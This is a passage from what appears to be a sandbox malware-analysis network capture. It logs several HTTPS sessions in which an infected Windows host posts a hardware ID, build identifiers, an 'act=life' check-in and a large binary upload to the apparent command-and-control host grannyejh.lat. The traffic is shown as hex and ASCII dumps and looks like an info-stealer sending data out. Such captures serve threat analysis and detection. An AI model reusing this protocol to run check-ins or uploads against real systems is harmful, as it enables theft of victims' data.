                                                                                                                                                                                                                                                          2024-12-19 13:26:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:26:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          37192.168.2.450211172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:26:55 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=KYU12958IDG80NI9AV
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8784
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:26:55 UTC8784OUTData Raw: 2d 2d 4b 59 55 31 32 39 35 38 49 44 47 38 30 4e 49 39 41 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 59 55 31 32 39 35 38 49 44 47 38 30 4e 49 39 41 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 59 55 31 32 39 35 38 49 44 47 38 30 4e 49 39 41 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                          Data Ascii: --KYU12958IDG80NI9AVContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--KYU12958IDG80NI9AVContent-Disposition: form-data; name="pid"2--KYU12958IDG80NI9AVContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                          2024-12-19 13:26:56 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:56 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=dk6jamm17vauej4i39r41a0j0g; expires=Mon, 14 Apr 2025 07:13:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2OWfrfsE0Bx331S2iPWg9%2F6u7D0pddHC6qfFMRRth041wg2gm8Kq5RFGI37o0oLUsh3KiitTI6m2PI7xLMpMPNi%2BWejdFrXXCjgHQR4e8ghbAApG%2FK6AKOWp4mGAyjW6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba276d554249-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1599&rtt_var=613&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9720&delivery_rate=1766485&cwnd=230&unsent_bytes=0&cid=2c2dee54230040c4&ts=808&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:26:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:26:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          38192.168.2.450212172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:26:57 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=QVD49IV3HE
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 20389
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:26:57 UTC15331OUTData Raw: 2d 2d 51 56 44 34 39 49 56 33 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 56 44 34 39 49 56 33 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 56 44 34 39 49 56 33 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 56 44 34 39 49 56 33 48 45 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                          Data Ascii: --QVD49IV3HEContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--QVD49IV3HEContent-Disposition: form-data; name="pid"3--QVD49IV3HEContent-Disposition: form-data; name="lid"PsFKDg--pablo--QVD49IV3HEContent-
                                                                                                                                                                                                                                                          2024-12-19 13:26:57 UTC5058OUTData Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c
                                                                                                                                                                                                                                                          Data Ascii: lrQMn 64F6(X&7~`aO@dR<
                                                                                                                                                                                                                                                          2024-12-19 13:26:58 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:58 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hqve9805fm2e6enk3k1ck4sjhc; expires=Mon, 14 Apr 2025 07:13:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=va5f3zdZPdl1gL53Qf%2FmvVSbo%2BNMGzv6i4%2B767So8iaucLhFxUsJJuuGWvIQ39bPShOiDJo4yY7EHrjAxG1bJDXUr0zDj6a0gWTaTkFbHWp%2BttXEke9c1%2FHjR4d67tkW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba3479fa43ca-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1702&rtt_var=651&sent=23&recv=35&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21340&delivery_rate=1665715&cwnd=223&unsent_bytes=0&cid=ce827100301421b5&ts=974&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:26:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:26:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          39192.168.2.450215172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:00 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=PQBIWE1ZPTLBXK
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 1231
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:00 UTC1231OUTData Raw: 2d 2d 50 51 42 49 57 45 31 5a 50 54 4c 42 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 51 42 49 57 45 31 5a 50 54 4c 42 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 51 42 49 57 45 31 5a 50 54 4c 42 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 50 51 42 49 57 45 31 5a
                                                                                                                                                                                                                                                          Data Ascii: --PQBIWE1ZPTLBXKContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--PQBIWE1ZPTLBXKContent-Disposition: form-data; name="pid"1--PQBIWE1ZPTLBXKContent-Disposition: form-data; name="lid"PsFKDg--pablo--PQBIWE1Z
                                                                                                                                                                                                                                                          2024-12-19 13:27:00 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:00 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hs2ta1p4d5hp4tfm8i4413k2qm; expires=Mon, 14 Apr 2025 07:13:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eTYodJTzYR89FK9j8xS6rxap%2BfbWQNR%2BboxpLjRAfbDhbAfNCZm2o3nQe5ohl3kOyDzpBJl1FuALCaOlN0DdSw4Cjp678%2FjTbUr8o6B3edpMXbnWalXn5yWiQaFgKjuF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba429b7c78ed-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1804&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2141&delivery_rate=1576673&cwnd=182&unsent_bytes=0&cid=d98b4c6818455447&ts=774&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                          2024-12-19 13:27:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          40192.168.2.450217172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:27:03 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=k6a6ikmo0s1elt3ced8bgnfp9a; expires=Mon, 14 Apr 2025 07:13:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRHtMb0PLU0e8necdpa8Gb%2FGiSgGHJhzXAQlMDt65AXyzTCi3m6yls0cWr29ojlZEYxy3Pm6KE%2F85sY06tfIl7JmXWTpI%2Bi2CW4BBYPYa99Oa0BCeU5avZf9ld6BCink"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f47ba55bfbd185d-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1585&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1724748&cwnd=238&unsent_bytes=0&cid=172e83567e720884&ts=773&x=0"
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                          41192.168.2.450218172.67.179.109443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=UBFYUX37049LPC6HFV
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 573459
                                                                                                                                                                                                                                                          Host: grannyejh.lat
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 2d 2d 55 42 46 59 55 58 33 37 30 34 39 4c 50 43 36 48 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 39 41 45 46 43 37 34 35 35 32 33 32 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 42 46 59 55 58 33 37 30 34 39 4c 50 43 36 48 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 42 46 59 55 58 33 37 30 34 39 4c 50 43 36 48 46 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                                                                                                                                                                          Data Ascii: --UBFYUX37049LPC6HFVContent-Disposition: form-data; name="hwid"4D9AEFC7455232ACAC8923850305D13E--UBFYUX37049LPC6HFVContent-Disposition: form-data; name="pid"1--UBFYUX37049LPC6HFVContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 41 4f 82 05 68 82 ed 4a ff 7a be 3a 4b 31 0d 50 ff ed a6 50 3b e0 78 6c b1 cd c0 f9 59 94 4f 52 00 c3 77 43 bf a0 b5 6d f1 2e d0 4d 1f ce 5e d9 c1 73 41 ab 78 94 b3 10 25 d2 a4 ea fa c0 63 37 44 f1 75 56 99 e1 32 50 64 db f6 e7 cb 76 28 f2 2c aa 33 4e 99 6e 2f d6 93 a8 c5 eb 9c 67 62 70 92 16 d7 f6 9d 39 2a e3 f6 5c 49 2b c6 1f f6 f1 46 d5 6d 9a 65 e1 54 7f be 4f 49 51 db 59 cd 59 30 88 3c 1e 73 77 66 5f 8b 36 84 9d 5b 7b a5 06 95 35 fa 26 42 6e 18 89 05 7a 12 8a de 91 11 5e a1 00 08 e5 37 26 6c 17 7e 34 89 7d e2 db ce 79 b0 90 59 31 8f 22 fb 20 95 35 36 b8 a8 71 4a 09 03 cf 5e 52 6e 51 c7 22 aa 90 f5 f5 51 e9 e7 9d 8d 12 4f ce 57 2f cf 0e e0 1d 2a 0f 8e 31 94 e9 35 87 96 58 29 34 8b 11 c7 78 b0 f4 f1 ab a1 1c 58 8a 1a 13 3c 69 07 7b fc 0b fb fd 7f 4b 35
                                                                                                                                                                                                                                                          Data Ascii: AOhJz:K1PP;xlYORwCm.M^sAx%c7DuV2Pdv(,3Nn/gbp9*\I+FmeTOIQYY0<swf_6[{5&Bnz^7&l~4}yY1" 56qJ^RnQ"QOW/*15X)4xX<i{K5
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 5b 6e 0a 5a f2 69 45 52 30 06 91 4e cc e3 de 99 da 38 ef 42 42 a0 44 41 97 95 2c 5c 2c 9f 8a e0 3d d8 c9 7e 80 6a 33 60 74 20 07 a4 cc f2 00 f5 09 69 b4 9f aa 59 66 22 db a6 34 9b fc 5d 87 6b be 85 3c 3b e1 cc f2 ca 6d 8e f2 71 30 8d 41 ca 7c 71 a4 e2 de df 27 3e 1e 4d 11 e9 14 fd b6 71 f8 1e 78 5f 2f 48 5a 14 14 4c bb 1c 13 fc 66 2a 6a 29 65 f9 4a 1d 39 1d 72 e5 35 10 c1 0b d3 fb ae 3b 54 59 61 20 68 7a b5 5a 69 33 0e c1 08 07 84 e3 b9 71 f8 8d 5f 4d 6a 9a 19 c6 3a d2 fd 17 b5 5c 6d 83 e3 47 ab 8b db eb eb 8c c3 1e 2b 11 be 40 f5 9f 40 f4 0f 09 ef d2 75 96 04 b4 8f cd 4b 51 16 9d 84 3e 8a 44 5b aa f8 e2 df 5c 23 f2 6c 79 0b 94 e2 2e f7 64 fa 63 35 b0 e0 eb fd 27 b0 ea 94 cb 9a b8 a1 ed 6c 52 75 40 5e c5 42 44 ec 20 5a 50 8f b1 50 b3 13 ce 7c ef 68 38 97
                                                                                                                                                                                                                                                          Data Ascii: [nZiER0N8BBDA,\,=~j3`t iYf"4]k<;mq0A|q'>Mqx_/HZLf*j)eJ9r5;TYa hzZi3q_Mj:\mG+@@uKQ>D[\#ly.dc5'lRu@^BD ZPP|h8
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: ab 02 5b c5 0e eb b5 4f e7 9e 30 3c 8e a5 d5 5c a5 88 80 31 63 65 1c 08 bd d4 44 a3 d5 06 8a 33 ec 6a 8a 6b bc 8e 1c d3 c4 38 4a 69 ac c6 1d 0a e8 78 01 c8 07 b6 64 17 f2 06 fd e7 4c d2 2f 23 01 f6 a5 38 cf 6e 46 f4 f6 32 cd 8a 66 2b 0a 5e ac 2d 13 e7 83 5c df ff 99 fe 64 20 70 50 ad 70 44 ae 70 58 fc f1 5d 51 1c b7 ff 1a 6d cf 91 9c be a7 ae bb 07 14 f8 de 96 ea 37 88 f3 0d ec 25 7d 0a e5 97 39 41 b3 8e cf 2d ec 8d d9 6a 97 bc 76 bb ee f5 3b cb b0 71 62 b1 31 14 fc b2 82 31 d8 5f 7b 66 15 22 77 01 fa 9d 7d d2 7a 4a fb 30 83 53 bf b9 c2 4e 6b 8a 24 1d 09 8a 5d d7 dc 1e 19 e0 82 d4 0d d8 81 08 b0 fe cf 8b ca c3 08 2a ea fe 47 2f ad 06 70 fc e2 af b3 e3 97 43 89 85 ef 71 bb 1e 9f f3 19 86 fa 03 5b 02 98 4d 7b 0f 56 4b 01 b7 8b f4 ae 26 a8 e8 07 d1 ac 02 47
                                                                                                                                                                                                                                                          Data Ascii: [O0<\1ceD3jk8JixdL/#8nF2f+^-\d pPpDpX]Qm7%}9A-jv;qb11_{f"w}zJ0SNk$]*G/pCq[M{VK&G
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 77 77 0e 37 d0 14 41 bd 1e 35 41 da ed 12 3d 8c 2a 06 84 da 3f 0a 5b bf a1 fa 24 e6 6d 7a 0f e8 73 0e ff 9b 69 13 4b 14 b6 15 0b ca d9 87 62 7a 80 02 7c ce 0f fe 7d e4 26 38 d3 d1 9b 13 48 a2 cc 89 6d 25 fc 2e b0 eb 32 72 25 b4 f5 47 3a e9 44 9f 9f a3 f2 75 fc 58 82 31 ef 74 e6 56 53 09 d3 e3 89 25 76 66 b2 e9 6b dc bf c3 f4 f3 4b a9 27 e8 09 f3 b0 1b 23 07 76 ed 42 59 5e 7e 80 3d 12 f9 bf 48 1b f6 90 1a f3 76 39 cb 67 d6 e7 e7 d6 f2 b2 fb a3 c5 32 03 c1 b9 bf 94 0a 80 77 e2 bb 37 a9 80 43 9e b5 8b f4 8c c8 f9 23 1e af 72 5c 36 45 ef 20 e9 6c 06 61 57 b6 3a 6c 30 38 74 fc 9f 06 fd bf 0b fc da 1e df d1 76 e7 10 87 fe 3b 71 67 0b 80 af 22 ec 1d 72 ba ee 53 c5 26 9e ff 06 7c b3 6d ff ea c0 ce c0 ae ed 61 29 88 fc 76 ec 2a 59 b9 61 6b d8 78 8e 1b 75 fb ac 8e
                                                                                                                                                                                                                                                          Data Ascii: ww7A5A=*?[$mzsiKbz|}&8Hm%.2r%G:DuX1tVS%vfkK'#vBY^~=Hv9g2w7C#r\6E laW:l08tv;qg"rS&|ma)v*Yakxu
                                                                                                                                                                                                                                                          2024-12-19 13:27:03 UTC15331OUTData Raw: 4b fd a9 1c 25 90 e6 01 4a 8b d5 8e ee 07 79 7d 1c 26 11 dc 45 63 04 ab 2a d7 97 1f 0b c8 45 0a f4 44 ad a5 2b a2 19 36 11 2c 32 60 5c 55 a2 fd f1 a4 cf 11 aa a8 27 8d 25 20 37 b5 ac 82 9b 47 b5 11 ee 85 b2 d9 0f d4 0d 9d ee a7 fa 58 af 1c f9 00 7c 3f 1f a6 4e e5 55 6e af cb bc 2f 19 e6 2f 8b 9e 89 43 37 33 d7 ed eb 5c 75 40 c2 ea bb 91 11 e8 6a 63 af bd 1e 7a fe 74 53 34 c8 42 87 cc eb 74 d3 cd ef 52 27 81 fa 1e a8 65 16 51 b6 13 00 c3 89 12 5f 3f 2d bd 35 83 6c 2d 66 64 e3 e5 a4 6d 27 ff a6 bf 6b 5f 64 02 6a f4 07 d7 b3 91 cf ab 71 f3 bc 72 c1 db 6c 3c 46 f6 d6 6c 4e fa 5a 6a ab c7 67 5c e2 d7 82 02 c9 d9 76 a4 fa 90 5e 4e e7 7e ab 7b d4 60 f8 0c 13 0d 9a 4b 38 13 bf 76 d5 b9 de 94 9c 13 11 ae 92 49 3d af 12 43 0e 1a 11 a4 7e 81 4f cf dd 8b b8 29 b6 81
                                                                                                                                                                                                                                                          Data Ascii: K%Jy}&Ec*ED+6,2`\U'% 7GX|?NUn//C73\u@jcztS4BtR'eQ_?-5l-fdm'k_djqrl<FlNZjg\v^N~{`K8vI=C~O)
